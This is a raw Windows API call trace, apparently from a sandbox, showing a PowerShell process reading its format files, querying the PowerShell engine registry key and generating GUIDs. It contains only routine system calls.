	[0785.490] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.490] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.491] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.491] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.491] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.496] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.497] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.497] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.497] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.497] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.498] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.498] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.498] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.499] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.499] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.499] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.499] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.500] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.500] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.500] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.500] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.501] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.501] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.501] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.501] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.502] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.502] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.502] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.502] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.503] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.503] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.503] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.503] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.505] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.506] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.506] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0xf37, lpOverlapped=0x0) returned 1
	[0785.506] ReadFile (in: hFile=0x328, lpBuffer=0x2d11817, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d11817*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0785.506] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0785.507] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0785.507] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
	[0785.507] CoTaskMemAlloc (cb=0x5a) returned 0x1b737290
	[0785.507] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b737290, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0785.507] CoTaskMemFree (pv=0x1b737290) 
	[0785.507] RegCloseKey (hKey=0x328) returned 0x0
	[0785.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0785.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0785.513] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xcdfdbbe1, Data2=0x63c, Data3=0x4599, Data4=([0]=0x8c, [1]=0x74, [2]=0xf3, [3]=0x2d, [4]=0x9f, [5]=0x5f, [6]=0x96, [7]=0x3c))) returned 0x0
	[0785.513] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x7d2a7fb9, Data2=0xf0a9, Data3=0x414f, Data4=([0]=0x88, [1]=0xdb, [2]=0x25, [3]=0x49, [4]=0x6b, [5]=0x71, [6]=0x1, [7]=0xb6))) returned 0x0
	[0785.522] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xa9a960a5, Data2=0xbcf6, Data3=0x4321, Data4=([0]=0xb8, [1]=0x86, [2]=0xc1, [3]=0x10, [4]=0x9f, [5]=0xe5, [6]=0xe6, [7]=0x0))) returned 0x0
	[0785.523] VirtualQuery (in: lpAddress=0x16b6a0, lpBuffer=0x16c560, dwLength=0x30 | out: lpBuffer=0x16c560*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0785.524] VirtualQuery (in: lpAddress=0x16b730, lpBuffer=0x16c5f0, dwLength=0x30 | out: lpBuffer=0x16c5f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0786.431] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc541b318, Data2=0x2afa, Data3=0x411e, Data4=([0]=0x81, [1]=0xcc, [2]=0x3b, [3]=0x80, [4]=0x18, [5]=0x27, [6]=0x7e, [7]=0x42))) returned 0x0
	[0786.433] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xbc64cf25, Data2=0x765a, Data3=0x4e72, Data4=([0]=0xbb, [1]=0x16, [2]=0x3d, [3]=0xce, [4]=0x54, [5]=0xb2, [6]=0x8f, [7]=0xc))) returned 0x0
	[0786.433] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xbe99b706, Data2=0x14de, Data3=0x4171, Data4=([0]=0x92, [1]=0xc9, [2]=0xc, [3]=0xa9, [4]=0x8d, [5]=0xdd, [6]=0xee, [7]=0xd2))) returned 0x0
	[0786.436] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x2c365041, Data2=0xd7bb, Data3=0x4e0b, Data4=([0]=0xa3, [1]=0x75, [2]=0x3d, [3]=0xdd, [4]=0xdf, [5]=0x89, [6]=0x45, [7]=0x40))) returned 0x0
	[0786.437] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x1191d0e2, Data2=0x5098, Data3=0x4717, Data4=([0]=0x94, [1]=0x7b, [2]=0x75, [3]=0x4b, [4]=0xd2, [5]=0xac, [6]=0x13, [7]=0xf1))) returned 0x0
	[0786.437] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x8e4c5e10, Data2=0x6087, Data3=0x4c95, Data4=([0]=0x85, [1]=0x50, [2]=0xd4, [3]=0xc0, [4]=0x85, [5]=0x35, [6]=0xe8, [7]=0xc0))) returned 0x0
	[0786.437] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x505ab646, Data2=0x1bf6, Data3=0x4d2a, Data4=([0]=0x98, [1]=0xd4, [2]=0x1c, [3]=0xe, [4]=0xf4, [5]=0x53, [6]=0x68, [7]=0x13))) returned 0x0
	[0786.438] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x776c921c, Data2=0x1063, Data3=0x4ef6, Data4=([0]=0xbd, [1]=0x3f, [2]=0x81, [3]=0x8, [4]=0xec, [5]=0x84, [6]=0xc4, [7]=0x8c))) returned 0x0
	[0786.438] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x162e58a0, Data2=0xf0eb, Data3=0x4ec6, Data4=([0]=0x9a, [1]=0x3b, [2]=0x1e, [3]=0xe, [4]=0x23, [5]=0x9f, [6]=0x49, [7]=0xfa))) returned 0x0
	[0786.439] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x45ed7417, Data2=0x4358, Data3=0x4646, Data4=([0]=0x98, [1]=0x8e, [2]=0x87, [3]=0xd1, [4]=0x2a, [5]=0x11, [6]=0x65, [7]=0x60))) returned 0x0
	[0786.439] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xa9a2a7b2, Data2=0xb07e, Data3=0x4eeb, Data4=([0]=0xb8, [1]=0x7d, [2]=0x68, [3]=0x6f, [4]=0x2f, [5]=0x1f, [6]=0x9, [7]=0x96))) returned 0x0
	[0786.439] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x5a8a3cd0, Data2=0xea64, Data3=0x4371, Data4=([0]=0xa3, [1]=0xc1, [2]=0x7f, [3]=0x87, [4]=0xb1, [5]=0xe7, [6]=0xf, [7]=0x4f))) returned 0x0
	[0786.442] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc3813aa5, Data2=0x2db8, Data3=0x4555, Data4=([0]=0xad, [1]=0x4a, [2]=0x13, [3]=0xa5, [4]=0x73, [5]=0xdd, [6]=0xb1, [7]=0x15))) returned 0x0
	[0786.444] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xde93562, Data2=0xf016, Data3=0x44d7, Data4=([0]=0x8a, [1]=0xb3, [2]=0x60, [3]=0x8b, [4]=0xe7, [5]=0x7b, [6]=0x42, [7]=0xc))) returned 0x0
	[0786.445] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x50d5123f, Data2=0xf00d, Data3=0x4b00, Data4=([0]=0xa3, [1]=0x58, [2]=0xbf, [3]=0xc1, [4]=0x7a, [5]=0x87, [6]=0xbb, [7]=0xf9))) returned 0x0
	[0786.445] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x65a2625, Data2=0x46f7, Data3=0x4498, Data4=([0]=0x87, [1]=0xc4, [2]=0x26, [3]=0xff, [4]=0xe1, [5]=0x5e, [6]=0x2a, [7]=0xab))) returned 0x0
	[0786.446] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xa2d547a1, Data2=0xe25e, Data3=0x4298, Data4=([0]=0x8b, [1]=0x55, [2]=0x61, [3]=0xe9, [4]=0x10, [5]=0x92, [6]=0x11, [7]=0x89))) returned 0x0
	[0786.447] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc34ad504, Data2=0xb729, Data3=0x4deb, Data4=([0]=0xa9, [1]=0xf8, [2]=0x72, [3]=0xb5, [4]=0x74, [5]=0xa7, [6]=0x96, [7]=0x9e))) returned 0x0
	[0786.448] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xe27b2944, Data2=0xabaf, Data3=0x4fd7, Data4=([0]=0x9f, [1]=0xb, [2]=0xa3, [3]=0xa1, [4]=0x62, [5]=0x30, [6]=0x33, [7]=0xd8))) returned 0x0
	[0786.448] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x484b502d, Data2=0x62d9, Data3=0x48f0, Data4=([0]=0x91, [1]=0xcd, [2]=0x6c, [3]=0x92, [4]=0x64, [5]=0x53, [6]=0xcb, [7]=0xa2))) returned 0x0
	[0786.448] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x8106b67a, Data2=0x9f92, Data3=0x4f77, Data4=([0]=0xa5, [1]=0x63, [2]=0x1e, [3]=0xca, [4]=0x92, [5]=0xa2, [6]=0x57, [7]=0x5c))) returned 0x0
	[0786.449] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x93885f01, Data2=0x7843, Data3=0x47f3, Data4=([0]=0xaf, [1]=0x85, [2]=0xd8, [3]=0x6f, [4]=0x5c, [5]=0x24, [6]=0xca, [7]=0x3e))) returned 0x0
	[0786.449] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0786.449] GetFileType (hFile=0x328) returned 0x1
	[0786.449] SetErrorMode (uMode=0x1) returned 0x1
	[0786.449] GetFileType (hFile=0x328) returned 0x1
	[0786.449] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.450] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.451] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.451] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.451] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.451] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.451] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.452] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.452] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.453] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.454] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.454] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.457] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.457] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.458] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.458] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.458] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.460] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.460] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.461] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.461] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0786.461] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0xe67, lpOverlapped=0x0) returned 1
	[0786.462] ReadFile (in: hFile=0x328, lpBuffer=0x31691c7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x31691c7*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0786.462] ReadFile (in: hFile=0x328, lpBuffer=0x3169bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3169bf8*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0786.462] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0786.462] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
